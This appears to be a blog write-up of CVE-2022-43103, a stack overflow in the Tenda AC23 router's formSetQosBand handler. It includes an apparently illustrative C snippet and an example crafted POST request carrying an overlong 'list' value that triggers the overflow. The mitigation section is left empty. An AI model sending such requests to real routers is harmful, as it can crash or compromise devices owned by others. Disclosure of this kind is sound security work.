A recent vulnerability, CVE-2022-43103, was discovered in Tenda AC23 V16.03.07.45_cn, a popular Wi-Fi router. This vulnerability directly affects the router's formSetQosBand function, which contains a stack overflow via the list parameter. In this post, we'll be discussing the details of the vulnerability, its consequences, and potential mitigation strategies.

Vulnerability Details

CVE-2022-43103 describes a vulnerability found in a specific version (V16.03.07.45_cn) of the Tenda AC23 Wi-Fi router. Stack overflow vulnerabilities occur when a program's stack memory is exceeded due to improper handling of variables, functions, or data during runtime.

In this case, the stack overflow occurs within the formSetQosBand function, which is responsible for setting the Quality of Service (QoS) bandwidth preferences for the router. The list parameter is utilized by the formSetQosBand function, and it's the main cause for the vulnerability.

Here is a code snippet showcasing the problematic portion of the implementation

void formSetQosBand(request *req, char *post_data)
{
    ...
    char list[64];
    int n, index, enable;
    ...

    strcpy(list, get_cstream_var(post_data, "list", ""));
    if(sscanf(list, "%d,%d", &index, &enable) != 2)
    {
        return;
    }
    ...
}

As seen in the code snippet above, the 'list' variable is limited to 64 characters. However, the 'strcpy' and 'sscanf' operations in the code do not adequately check for the length of the incoming 'post_data' input, making the stack overflow vulnerability possible.

When an attacker sends a POST request with crafted 'list' value containing more than 64 characters, it overflow can occur, causing undefined behavior or potentially leading to remote code execution (RCE) under certain conditions. This poses a significant security risk for the users of the affected Tenda AC23 router.

- The original CVE entry can be found here

- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43103

- Details on the affected Tenda product and version can be found on the vendor's website

- https://www.tendacn.com/en/product/ac23.html

Exploit

An attacker can exploit this vulnerability by sending a crafted POST request with an extended 'list' parameter value to the router's administrative interface. To achieve this, a valid session cookie is required. While exploiting routers generally requires a user to be on the same network, specific remote scenarios may also be possible.

Here's an example of a crafted POST request that could trigger the stack overflow

POST /goform/formSetQosBand HTTP/1.1
Host: Router_IP_Address
Cookie: SESSIONID=<Valid Session ID>
Content-Type: application/x-www-form-urlencoded
Content-Length: XX

list=11111111112222222222333333333344444444445555555555666666666677777777778888%2C1

Mitigation

Currently, there's no known patch or update from Tenda addressing this vulnerability. As a user, you can take the following steps to protect yourself from potential attacks:

Conclusion

The Tenda AC23 V16.03.07.45_cn router is affected by a stack overflow vulnerability, where an incorrectly handled list parameter in the formSetQosBand function can lead to a possible attack. Users of the affected router should be aware of this vulnerability, monitor for firmware updates from Tenda, and follow best practices to protect their networks and devices.

Timeline

Published on: 11/03/2022 14:15:00 UTC
Last modified on: 11/03/2022 17:20:00 UTC